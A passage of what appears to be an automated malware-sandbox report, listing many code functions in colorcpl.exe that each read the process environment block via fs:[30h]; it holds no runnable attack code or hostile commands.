Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434B5E0 mov eax, dword ptr fs:[00000030h]	3_2_0434B5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434B5E0 mov eax, dword ptr fs:[00000030h]	3_2_0434B5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434B5E0 mov eax, dword ptr fs:[00000030h]	3_2_0434B5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434B5E0 mov eax, dword ptr fs:[00000030h]	3_2_0434B5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434B5E0 mov eax, dword ptr fs:[00000030h]	3_2_0434B5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434B5E0 mov eax, dword ptr fs:[00000030h]	3_2_0434B5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043715EF mov eax, dword ptr fs:[00000030h]	3_2_043715EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C55E0 mov eax, dword ptr fs:[00000030h]	3_2_043C55E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043765D0 mov eax, dword ptr fs:[00000030h]	3_2_043765D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CB5D3 mov eax, dword ptr fs:[00000030h]	3_2_043CB5D3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437C5C6 mov eax, dword ptr fs:[00000030h]	3_2_0437C5C6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F5C7 mov eax, dword ptr fs:[00000030h]	3_2_0433F5C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C05C6 mov eax, dword ptr fs:[00000030h]	3_2_043C05C6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04340630 mov eax, dword ptr fs:[00000030h]	3_2_04340630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04370630 mov eax, dword ptr fs:[00000030h]	3_2_04370630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437F63F mov eax, dword ptr fs:[00000030h]	3_2_0437F63F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437F63F mov eax, dword ptr fs:[00000030h]	3_2_0437F63F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C8633 mov esi, dword ptr fs:[00000030h]	3_2_043C8633
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C8633 mov eax, dword ptr fs:[00000030h]	3_2_043C8633
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C8633 mov eax, dword ptr fs:[00000030h]	3_2_043C8633
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043ED62C mov ecx, dword ptr fs:[00000030h]	3_2_043ED62C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043ED62C mov ecx, dword ptr fs:[00000030h]	3_2_043ED62C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043ED62C mov eax, dword ptr fs:[00000030h]	3_2_043ED62C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04345622 mov eax, dword ptr fs:[00000030h]	3_2_04345622
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04345622 mov eax, dword ptr fs:[00000030h]	3_2_04345622
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04347623 mov eax, dword ptr fs:[00000030h]	3_2_04347623
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437C620 mov eax, dword ptr fs:[00000030h]	3_2_0437C620
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D3608 mov eax, dword ptr fs:[00000030h]	3_2_043D3608
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D3608 mov eax, dword ptr fs:[00000030h]	3_2_043D3608
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D3608 mov eax, dword ptr fs:[00000030h]	3_2_043D3608
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D3608 mov eax, dword ptr fs:[00000030h]	3_2_043D3608
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D3608 mov eax, dword ptr fs:[00000030h]	3_2_043D3608
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D3608 mov eax, dword ptr fs:[00000030h]	3_2_043D3608
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436D600 mov eax, dword ptr fs:[00000030h]	3_2_0436D600
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436D600 mov eax, dword ptr fs:[00000030h]	3_2_0436D600
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF607 mov eax, dword ptr fs:[00000030h]	3_2_043FF607
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437360F mov eax, dword ptr fs:[00000030h]	3_2_0437360F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C9603 mov eax, dword ptr fs:[00000030h]	3_2_043C9603
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414600 mov eax, dword ptr fs:[00000030h]	3_2_04414600
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04340670 mov eax, dword ptr fs:[00000030h]	3_2_04340670
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382670 mov eax, dword ptr fs:[00000030h]	3_2_04382670
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382670 mov eax, dword ptr fs:[00000030h]	3_2_04382670
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04337662 mov eax, dword ptr fs:[00000030h]	3_2_04337662
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04337662 mov eax, dword ptr fs:[00000030h]	3_2_04337662
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04337662 mov eax, dword ptr fs:[00000030h]	3_2_04337662
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C166E mov eax, dword ptr fs:[00000030h]	3_2_043C166E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C166E mov eax, dword ptr fs:[00000030h]	3_2_043C166E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C166E mov eax, dword ptr fs:[00000030h]	3_2_043C166E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04353660 mov eax, dword ptr fs:[00000030h]	3_2_04353660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04353660 mov eax, dword ptr fs:[00000030h]	3_2_04353660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04353660 mov eax, dword ptr fs:[00000030h]	3_2_04353660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437666D mov esi, dword ptr fs:[00000030h]	3_2_0437666D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437666D mov eax, dword ptr fs:[00000030h]	3_2_0437666D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437666D mov eax, dword ptr fs:[00000030h]	3_2_0437666D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CE660 mov eax, dword ptr fs:[00000030h]	3_2_043CE660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D5660 mov eax, dword ptr fs:[00000030h]	3_2_043D5660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04375654 mov eax, dword ptr fs:[00000030h]	3_2_04375654
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437265C mov eax, dword ptr fs:[00000030h]	3_2_0437265C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437265C mov ecx, dword ptr fs:[00000030h]	3_2_0437265C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437265C mov eax, dword ptr fs:[00000030h]	3_2_0437265C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434965A mov eax, dword ptr fs:[00000030h]	3_2_0434965A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434965A mov eax, dword ptr fs:[00000030h]	3_2_0434965A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04343640 mov eax, dword ptr fs:[00000030h]	3_2_04343640
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435F640 mov eax, dword ptr fs:[00000030h]	3_2_0435F640
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435F640 mov eax, dword ptr fs:[00000030h]	3_2_0435F640
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435F640 mov eax, dword ptr fs:[00000030h]	3_2_0435F640
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437C640 mov eax, dword ptr fs:[00000030h]	3_2_0437C640
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437C640 mov eax, dword ptr fs:[00000030h]	3_2_0437C640
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433D64A mov eax, dword ptr fs:[00000030h]	3_2_0433D64A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433D64A mov eax, dword ptr fs:[00000030h]	3_2_0433D64A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440A6C0 mov eax, dword ptr fs:[00000030h]	3_2_0440A6C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04348690 mov eax, dword ptr fs:[00000030h]	3_2_04348690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BD69D mov eax, dword ptr fs:[00000030h]	3_2_043BD69D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CC691 mov eax, dword ptr fs:[00000030h]	3_2_043CC691
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF68C mov eax, dword ptr fs:[00000030h]	3_2_043FF68C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680 mov eax, dword ptr fs:[00000030h]	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BC6F2 mov eax, dword ptr fs:[00000030h]	3_2_043BC6F2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BC6F2 mov eax, dword ptr fs:[00000030h]	3_2_043BC6F2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043396E0 mov eax, dword ptr fs:[00000030h]	3_2_043396E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043396E0 mov eax, dword ptr fs:[00000030h]	3_2_043396E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434C6E0 mov eax, dword ptr fs:[00000030h]	3_2_0434C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043456E0 mov eax, dword ptr fs:[00000030h]	3_2_043456E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043456E0 mov eax, dword ptr fs:[00000030h]	3_2_043456E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043456E0 mov eax, dword ptr fs:[00000030h]	3_2_043456E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043666E0 mov eax, dword ptr fs:[00000030h]	3_2_043666E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043666E0 mov eax, dword ptr fs:[00000030h]	3_2_043666E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D56E0 mov eax, dword ptr fs:[00000030h]	3_2_043D56E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D56E0 mov eax, dword ptr fs:[00000030h]	3_2_043D56E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436D6D0 mov eax, dword ptr fs:[00000030h]	3_2_0436D6D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044086A8 mov eax, dword ptr fs:[00000030h]	3_2_044086A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044086A8 mov eax, dword ptr fs:[00000030h]	3_2_044086A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D66D0 mov eax, dword ptr fs:[00000030h]	3_2_043D66D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D66D0 mov eax, dword ptr fs:[00000030h]	3_2_043D66D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043406CF mov eax, dword ptr fs:[00000030h]	3_2_043406CF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043E86C2 mov eax, dword ptr fs:[00000030h]	3_2_043E86C2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04369723 mov eax, dword ptr fs:[00000030h]	3_2_04369723
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF717 mov eax, dword ptr fs:[00000030h]	3_2_043FF717
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434471B mov eax, dword ptr fs:[00000030h]	3_2_0434471B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434471B mov eax, dword ptr fs:[00000030h]	3_2_0434471B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434D700 mov ecx, dword ptr fs:[00000030h]	3_2_0434D700
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B705 mov eax, dword ptr fs:[00000030h]	3_2_0433B705
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B705 mov eax, dword ptr fs:[00000030h]	3_2_0433B705
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B705 mov eax, dword ptr fs:[00000030h]	3_2_0433B705
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B705 mov eax, dword ptr fs:[00000030h]	3_2_0433B705
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436270D mov eax, dword ptr fs:[00000030h]	3_2_0436270D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436270D mov eax, dword ptr fs:[00000030h]	3_2_0436270D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436270D mov eax, dword ptr fs:[00000030h]	3_2_0436270D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04370774 mov eax, dword ptr fs:[00000030h]	3_2_04370774
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440970B mov eax, dword ptr fs:[00000030h]	3_2_0440970B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440970B mov eax, dword ptr fs:[00000030h]	3_2_0440970B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04344779 mov eax, dword ptr fs:[00000030h]	3_2_04344779
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04344779 mov eax, dword ptr fs:[00000030h]	3_2_04344779
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04352760 mov ecx, dword ptr fs:[00000030h]	3_2_04352760
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381763 mov eax, dword ptr fs:[00000030h]	3_2_04381763
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381763 mov eax, dword ptr fs:[00000030h]	3_2_04381763
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381763 mov eax, dword ptr fs:[00000030h]	3_2_04381763
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381763 mov eax, dword ptr fs:[00000030h]	3_2_04381763
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381763 mov eax, dword ptr fs:[00000030h]	3_2_04381763
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381763 mov eax, dword ptr fs:[00000030h]	3_2_04381763
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04362755 mov eax, dword ptr fs:[00000030h]	3_2_04362755
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04362755 mov eax, dword ptr fs:[00000030h]	3_2_04362755
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04362755 mov eax, dword ptr fs:[00000030h]	3_2_04362755
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04362755 mov ecx, dword ptr fs:[00000030h]	3_2_04362755
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04362755 mov eax, dword ptr fs:[00000030h]	3_2_04362755
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04362755 mov eax, dword ptr fs:[00000030h]	3_2_04362755
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437A750 mov eax, dword ptr fs:[00000030h]	3_2_0437A750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F75B mov eax, dword ptr fs:[00000030h]	3_2_0433F75B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EE750 mov eax, dword ptr fs:[00000030h]	3_2_043EE750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04373740 mov eax, dword ptr fs:[00000030h]	3_2_04373740
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C174B mov eax, dword ptr fs:[00000030h]	3_2_043C174B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C174B mov ecx, dword ptr fs:[00000030h]	3_2_043C174B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437174A mov eax, dword ptr fs:[00000030h]	3_2_0437174A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043407A7 mov eax, dword ptr fs:[00000030h]	3_2_043407A7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04371796 mov eax, dword ptr fs:[00000030h]	3_2_04371796
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04371796 mov eax, dword ptr fs:[00000030h]	3_2_04371796
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE79D mov eax, dword ptr fs:[00000030h]	3_2_043BE79D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441B781 mov eax, dword ptr fs:[00000030h]	3_2_0441B781
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441B781 mov eax, dword ptr fs:[00000030h]	3_2_0441B781
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043477F9 mov eax, dword ptr fs:[00000030h]	3_2_043477F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043477F9 mov eax, dword ptr fs:[00000030h]	3_2_043477F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043437E4 mov eax, dword ptr fs:[00000030h]	3_2_043437E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043437E4 mov eax, dword ptr fs:[00000030h]	3_2_043437E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043437E4 mov eax, dword ptr fs:[00000030h]	3_2_043437E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043437E4 mov eax, dword ptr fs:[00000030h]	3_2_043437E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043437E4 mov eax, dword ptr fs:[00000030h]	3_2_043437E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043437E4 mov eax, dword ptr fs:[00000030h]	3_2_043437E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043437E4 mov eax, dword ptr fs:[00000030h]	3_2_043437E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E7E0 mov eax, dword ptr fs:[00000030h]	3_2_0436E7E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440D7A7 mov eax, dword ptr fs:[00000030h]	3_2_0440D7A7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440D7A7 mov eax, dword ptr fs:[00000030h]	3_2_0440D7A7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440D7A7 mov eax, dword ptr fs:[00000030h]	3_2_0440D7A7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF7CF mov eax, dword ptr fs:[00000030h]	3_2_043FF7CF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044117BC mov eax, dword ptr fs:[00000030h]	3_2_044117BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441505B mov eax, dword ptr fs:[00000030h]	3_2_0441505B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433D02D mov eax, dword ptr fs:[00000030h]	3_2_0433D02D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382010 mov ecx, dword ptr fs:[00000030h]	3_2_04382010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04365004 mov eax, dword ptr fs:[00000030h]	3_2_04365004
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04365004 mov ecx, dword ptr fs:[00000030h]	3_2_04365004
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04348009 mov eax, dword ptr fs:[00000030h]	3_2_04348009
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04346074 mov eax, dword ptr fs:[00000030h]	3_2_04346074
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04346074 mov eax, dword ptr fs:[00000030h]	3_2_04346074
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04347072 mov eax, dword ptr fs:[00000030h]	3_2_04347072
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043E9060 mov eax, dword ptr fs:[00000030h]	3_2_043E9060
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04341051 mov eax, dword ptr fs:[00000030h]	3_2_04341051
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04341051 mov eax, dword ptr fs:[00000030h]	3_2_04341051
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04370044 mov eax, dword ptr fs:[00000030h]	3_2_04370044
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C6040 mov eax, dword ptr fs:[00000030h]	3_2_043C6040
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FB0AF mov eax, dword ptr fs:[00000030h]	3_2_043FB0AF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF0A5 mov eax, dword ptr fs:[00000030h]	3_2_043EF0A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF0A5 mov eax, dword ptr fs:[00000030h]	3_2_043EF0A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF0A5 mov eax, dword ptr fs:[00000030h]	3_2_043EF0A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF0A5 mov eax, dword ptr fs:[00000030h]	3_2_043EF0A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF0A5 mov eax, dword ptr fs:[00000030h]	3_2_043EF0A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF0A5 mov eax, dword ptr fs:[00000030h]	3_2_043EF0A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF0A5 mov eax, dword ptr fs:[00000030h]	3_2_043EF0A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C60A0 mov eax, dword ptr fs:[00000030h]	3_2_043C60A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C60A0 mov eax, dword ptr fs:[00000030h]	3_2_043C60A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C60A0 mov eax, dword ptr fs:[00000030h]	3_2_043C60A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C60A0 mov eax, dword ptr fs:[00000030h]	3_2_043C60A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C60A0 mov eax, dword ptr fs:[00000030h]	3_2_043C60A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C60A0 mov eax, dword ptr fs:[00000030h]	3_2_043C60A0
